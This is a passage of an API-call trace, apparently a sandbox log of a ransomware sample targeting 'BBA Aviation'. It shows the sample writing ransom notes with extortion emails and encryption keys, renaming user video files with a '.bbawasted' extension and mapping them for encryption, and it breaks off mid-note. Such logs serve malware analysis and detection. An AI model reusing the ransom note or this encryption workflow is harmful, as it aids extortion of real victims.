[0231.061] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]KiehDvPnOUV94PfSSRoDdtJVlwtrZrmS1/vbylhT8wRcOEDlXlQANaDmRxEYILrL\r\nxFoXly8S+5139g6xYH/FibbwIfHl1MhFm8Wgx/hF+AuvEXuM/JQHYaHjPNSGIxcL\r\nOX8apPn74BK5T0zq/OSG2UsoH6i0oGIFMZqNAGPebsB+fPjrVwu7n9Jyi19onI+6\r\nWP8Adxg+zgH5XkFSIJjzSHoTZYdb9YM7bPPLQrt3HzQ1BTteSGkYuCaCzD5Cl/7V\r\nb8AX1sJilPMWKrypSXuSmsIYjZoBOFvNnLnFeOjia9MXKnCA66iuDt/1ZbwJw5Gj\r\nTkipK52rpDEdibQrXKMXnQXOftCStREl21n7YFwUKK7V3OtlY+yvT3gy7sAxucxW\r\nKp5Pkoo7uA4PcQayoJsfVhVLJBZJKvUmc08RJH/FHkrW/90JFdEoVRojWXfzUGiJ\r\n34dRNzUmxAySKognTxRJjNKpgqXlK9Pmqs+K/FOGMRXzyNv25KLtzJXGa8u/kk3j\r\ne2AE3G0aKacgHTvup5reUqL0kD6hU50z/7EmQJ82ahS8h9YYCFD6cXYa83eAh9bA\r\nDz+ysYloRxq9hIypJrzS28uj2L1soI/WnmqH+GbpzTOMngyDOMlgkyD0/7Y8GMCI\r\n8X5pux3JLEpnTEqpul+EBF5ENaKRM7u4d9ZQSi1RTbx=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0231.061] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0231.062] SetEndOfFile (hFile=0x27c) returned 1 [0231.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.064] CloseHandle (hObject=0x27c) returned 1 [0231.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0231.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6198 | out: hHeap=0x660000) returned 1 [0231.064] _aulldvrm () returned 0x0 [0231.064] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a60a8) returned 1 [0231.065] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0231.065] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0231.065] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\NBWHLS0xCrY7n.flv") returned 78 [0231.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a6) returned 0x6ae598 [0231.065] lstrcpyW (in: lpString1=0x6ae634, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.065] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0231.065] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0231.066] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0231.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\NBWHLS0xCrY7n.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\nbwhls0xcry7n.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0231.067] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.068] SetEndOfFile (hFile=0x27c) returned 1 [0231.068] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.068] lstrcpyW (in: lpString1=0x6ae634, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\NBWHLS0xCrY7n.flv" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\nbwhls0xcry7n.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\NBWHLS0xCrY7n.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\nbwhls0xcry7n.flv.bbawasted")) returned 1 [0231.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\NBWHLS0xCrY7n.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\nbwhls0xcry7n.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0231.069] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0231.070] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xde30 [0231.070] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xde30) returned 0x5f0000 [0231.070] CloseHandle (hObject=0x28c) returned 1 [0231.072] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.073] CloseHandle (hObject=0x290) returned 1 [0231.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0231.073] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a64e8) returned 1 [0231.074] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0231.074] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0231.074] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6130) returned 1 [0231.074] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0231.074] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0231.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0231.083] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0231.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.083] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]KLnXaEo/wZOkUxDAFJBwAXtBFqq++SXQds1JERRg6n2nGTB0aYGL74lN/VGVCPMw\r\nlJbxEeOm3EOK0ZgnWzh8ImvX+QtFeBSZpVk1CRA5OMQnhQZNgtz93/Pt0tJhmnwF\r\n/BF4QIJ2uIOc5F+lDXnquhKWx1Ls+ayjYtLeN8P6BU/x9anvbKy/lIYsp0XWHxr1\r\nIZ9tI5yWhoSqpSc2ex3ZVzPZWdtZgP3IZlS0LtKYgPa5WxYtH495udhMxW+XH7RV\r\nprgVQ/yxJMloQNMXCZPl/jUYwe28HhMOOFqNBRNozMUvbSIY66CPU6aC1SsAtKUH\r\nuFXlwZaRd9UWh26ieGjYnnikb73f/GmXTsLu5noTQ00a1RRxIuyGfQAbZUDdj8CN\r\nsYKxgcoRMnKg4m+258D3Z+qM2tlwp7xeRvkGwepJ/7RaJ4q1lNVkVIoUmgOjZY0S\r\nwdbhyclwLeQ3fb2aixzyWyhqj3xQPpjBjWIHDA5xmBBKmjCTK3mjmrYJm66cy315\r\nvgzNsf275taCrcIevp9v4gj+Wn+Ctkn96Y80EPshrW2aXtLGeB+WfB1uVSldC5NY\r\nhh/vhdS1+cVXCU/jXhmkNpMh9vqcp9lu7dI0x681uRs7xi35Yw2UBVv6WFe49Xzr\r\njWE8yLz8HFc+scHuVmGxeQWyKG8S3sJ8mgEpO6ro4l7=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.083] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0231.083] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0231.083] SetEndOfFile (hFile=0x27c) returned 1 [0231.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.086] CloseHandle (hObject=0x27c) returned 1 [0231.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0231.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aeaf8 | out: hHeap=0x660000) returned 1 [0231.086] _aulldvrm () returned 0x0 [0231.086] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6790) returned 1 [0231.087] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0231.087] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0231.087] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\VOja1CihZgQUMC94.avi") returned 81 [0231.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ac) returned 0x6ae598 [0231.087] lstrcpyW (in: lpString1=0x6ae63a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.087] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0231.088] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0231.088] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0231.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\VOja1CihZgQUMC94.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\voja1cihzgqumc94.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0231.088] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.090] SetEndOfFile (hFile=0x27c) returned 1 [0231.090] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.090] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.090] lstrcpyW (in: lpString1=0x6ae63a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\VOja1CihZgQUMC94.avi" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\voja1cihzgqumc94.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\VOja1CihZgQUMC94.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\voja1cihzgqumc94.avi.bbawasted")) returned 1 [0231.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\VOja1CihZgQUMC94.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\voja1cihzgqumc94.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0231.091] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0231.091] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1686b [0231.091] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1686b) returned 0x5f0000 [0231.091] CloseHandle (hObject=0x290) returned 1 [0231.093] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.094] CloseHandle (hObject=0x28c) returned 1 [0231.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0231.094] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a60a8) returned 1 [0231.095] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0231.095] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0231.095] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0231.096] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0231.096] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0231.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0231.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0231.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.310] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]RFwjHJF0fArERmO7OcTbjEVnjeomhrwPHmwoza7cEFtmbaFxpova+JHv/bcgqTfl\r\n5rKW1KYIRl8cAaUoJ5LNWwaMZ/tFEGkH+aX062YzfIFTeAugrLxQPJ4JHlELdobj\r\np9TYcqCSgZNb+d0ID/fjCK5Lhi3oF8drfDn8Qk2rWsEIC7UohLX1Z+v3AgV/zt3M\r\n03ww9sKozxP4fd07Ec7rT2WxUBzqhGB1TBl/YOOXKPVnwB2YhlMooTbt3C6uF7Cq\r\nSn4GlBIBLnnFBvYYCLs5lZNTQNb9ESliCcO38zRpGG7EmQons2FFluKulZBWwrdS\r\nTmCGKA70B4lQWzXm8f457WuYRO/E1+8lNw1mZDFLLAxhKWyYqNGRQoxhAml/sSAY\r\ngikIFJijFymn05PfhPcA0k+E4KBr+cTbFAO2O76g1t2JCkvZMMEuRfSDdCwCIntX\r\nqMmQOFK9OaIbRyxV+BIzNSmOQqqhUb4FU05gZIX53AzqQuE32HibSo7zzc6xvGJ9\r\nBWExTfzPbS7N2yBW2baGgMrLAJqAqlxA9/uKR/v9g9zCK1Po5L3mvkPmb49LtGlm\r\nGR+3ree/N38Zx6Uf0tTOIe4u19+0jH27+vI4eS6VdgrPJgURkEPCC7MWM2DxKh3y\r\nK66o3TwShqRtjvKQ2oE8VIdxW0hIa+NrBeJsmviNJLm=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0231.310] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0231.310] SetEndOfFile (hFile=0x27c) returned 1 [0231.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.321] CloseHandle (hObject=0x27c) returned 1 [0231.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0231.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aebf0 | out: hHeap=0x660000) returned 1 [0231.322] _aulldvrm () returned 0x0 [0231.322] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0231.322] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0231.322] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0231.322] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\LNA-ezx4lo63YB1.mp4") returned 60 [0231.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6ae598 [0231.323] lstrcpyW (in: lpString1=0x6ae610, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.323] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a62c8) returned 1 [0231.323] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0231.323] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0231.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\LNA-ezx4lo63YB1.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\lna-ezx4lo63yb1.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0231.324] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.325] SetEndOfFile (hFile=0x27c) returned 1 [0231.326] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.326] lstrcpyW (in: lpString1=0x6ae610, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\LNA-ezx4lo63YB1.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\lna-ezx4lo63yb1.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\LNA-ezx4lo63YB1.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\lna-ezx4lo63yb1.mp4.bbawasted")) returned 1 [0231.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\LNA-ezx4lo63YB1.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\lna-ezx4lo63yb1.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0231.326] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0231.327] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x15cbc [0231.327] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15cbc) returned 0x5f0000 [0231.327] CloseHandle (hObject=0x290) returned 1 [0231.330] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.331] CloseHandle (hObject=0x294) returned 1 [0231.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0231.331] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0231.332] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0231.332] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0231.332] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0231.332] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0231.332] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0231.345] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0231.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0231.345] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.345] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 